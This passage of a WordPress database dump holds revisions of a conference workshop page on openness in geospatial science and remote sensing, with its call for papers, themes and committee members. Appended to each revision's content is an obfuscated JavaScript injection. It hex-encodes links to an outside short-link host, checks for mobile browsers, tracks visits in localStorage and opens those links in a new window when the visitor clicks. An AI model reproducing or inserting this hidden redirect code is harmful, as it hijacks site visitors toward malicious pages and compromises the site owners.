_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Openness in Geospatial and Remote Sensing</strong>','','inherit','closed','closed','','3497-revision-v1','','','2023-01-01 19:03:13','2023-01-01 19:03:13','',3497,'https://gsw2023.com/?p=3512',0,'revision','',0),
(3513,1,'2023-01-01 19:05:29','2023-01-01 19:05:29','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3499\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5><strong>Openness helps improve access, use, reuse, and delivery of trustworthy information and data, foster innovation, shape new policies and enrich the delivery of services for societal needs in a more open and transparent manner. In the Geospatial and Remote Sensing domains, the concept of Openness is at the core of several initiatives, from policies and legal interventions in the field of Spatial Data Infrastructures (SDIs) such as e.g., the European INSPIRE Directive, to publicly-funded programmes like Copernicus, international partnerships such as the Group on Earth Observation (GEO), research approaches fostering open science, and community-led projects such as Pangeo, OpenStreetMap and the UN OpenGIS Initiative. The concept of Openness is based on three main elements: Accessibility (of data, software, standards and information), Inclusiveness (growing participation of diverse communities and partnerships between different actors: public sector, private sector, academia and citizens), and Reproducibility (effective sharing and reuse of resources and collaboration through open software tools, frameworks, libraries and open infrastructures).</strong></h5>\n<h5><strong>This workshop aims at bringing together experts in Open Source for Geospatial and Open Earth Observation Science and Applications to: i) discuss the advancements in the fields of open source software, open standards, open science, open innovation and open educational resources in the Geospatial and Remote Sensing domains; ii) explore new technology developments that enable Openness in Geospatial and Remote Sensing; iii) evaluate how Openness contributes to scientific advancements; and iv) showcase applications that build upon open principles to deliver products and information with societal benefits. We welcome all types of papers addressing the above, including research papers, review papers as well as papers presenting new technology, approaches and case studies and highlighting the originality compared to the state of the art. We especially welcome papers that – to the maximum extent possible – are reproducible, i.e. make all artefacts (input data, computational steps, methods and code) openly available so that consistent results can be achieved. When available, the code used in the research work shall be released under an open source license.</strong></h5>\n<h5><strong>The workshop will be part of the ISPRS Geospatial Week 2023, and is organised by the ISPRS ICWG IV/III/II <em>Openness in Geospatial Science and Remote Sensing</em>. It will be a one-day single-track workshop of oral presentations and poster sessions.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Advancements in and applications of Open Source Software for Geospatial</li>\n<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\n<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\n<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\n<li>Use cases and applications based on Open Standards</li>\n<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\n<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\n<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\n<li>Open Innovation and Participatory Research</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\n<li>Peter Mooney, Maynooth University, Ireland</li>\n<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\n<li>Claudia Vitolo, European Space Agency, Italy</li>\n<li>Stefanie Lumnitz, European Space Agency, Italy</li>\n<li>Stephan Meissl, EOX IT Services, Austria</li>\n<li>Alessandro Sarretta, National Research Council, Italy</li>\n<li>Alexander Kotsev, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<p>Other members to be added</p>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Openness in Geospatial and Remote Sensing</strong>','','inherit','closed','closed','','3497-revision-v1','','','2023-01-01 19:05:29','2023-01-01 19:05:29','',3497,'https://gsw2023.com/?p=3513',0,'revision','',0),
(3514,1,'2023-01-01 19:07:06','2023-01-01 19:07:06','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3499\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;><strong>Openness helps improve access, use, reuse, and delivery of trustworthy information and data, foster innovation, shape new policies and enrich the delivery of services for societal needs in a more open and transparent manner. In the Geospatial and Remote Sensing domains, the concept of Openness is at the core of several initiatives, from policies and legal interventions in the field of Spatial Data Infrastructures (SDIs) such as e.g., the European INSPIRE Directive, to publicly-funded programmes like Copernicus, international partnerships such as the Group on Earth Observation (GEO), research approaches fostering open science, and community-led projects such as Pangeo, OpenStreetMap and the UN OpenGIS Initiative. The concept of Openness is based on three main elements: Accessibility (of data, software, standards and information), Inclusiveness (growing participation of diverse communities and partnerships between different actors: public sector, private sector, academia and citizens), and Reproducibility (effective sharing and reuse of resources and collaboration through open software tools, frameworks, libraries and open infrastructures).</strong></h5>\n<h5 style=\"text-align: justify;><strong>This workshop aims at bringing together experts in Open Source for Geospatial and Open Earth Observation Science and Applications to: i) discuss the advancements in the fields of open source software, open standards, open science, open innovation and open educational resources in the Geospatial and Remote Sensing domains; ii) explore new technology developments that enable Openness in Geospatial and Remote Sensing; iii) evaluate how Openness contributes to scientific advancements; and iv) showcase applications that build upon open principles to deliver products and information with societal benefits. We welcome all types of papers addressing the above, including research papers, review papers as well as papers presenting new technology, approaches and case studies and highlighting the originality compared to the state of the art. We especially welcome papers that – to the maximum extent possible – are reproducible, i.e. make all artefacts (input data, computational steps, methods and code) openly available so that consistent results can be achieved. When available, the code used in the research work shall be released under an open source license.</strong></h5>\n<h5 style=\"text-align: justify;><strong>The workshop will be part of the ISPRS Geospatial Week 2023, and is organised by the ISPRS ICWG IV/III/II <em>Openness in Geospatial Science and Remote Sensing</em>. It will be a one-day single-track workshop of oral presentations and poster sessions.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Advancements in and applications of Open Source Software for Geospatial</li>\n<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\n<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\n<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\n<li>Use cases and applications based on Open Standards</li>\n<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\n<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\n<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\n<li>Open Innovation and Participatory Research</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\n<li>Peter Mooney, Maynooth University, Ireland</li>\n<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\n<li>Claudia Vitolo, European Space Agency, Italy</li>\n<li>Stefanie Lumnitz, European Space Agency, Italy</li>\n<li>Stephan Meissl, EOX IT Services, Austria</li>\n<li>Alessandro Sarretta, National Research Council, Italy</li>\n<li>Alexander Kotsev, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<p>Other members to be added</p>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 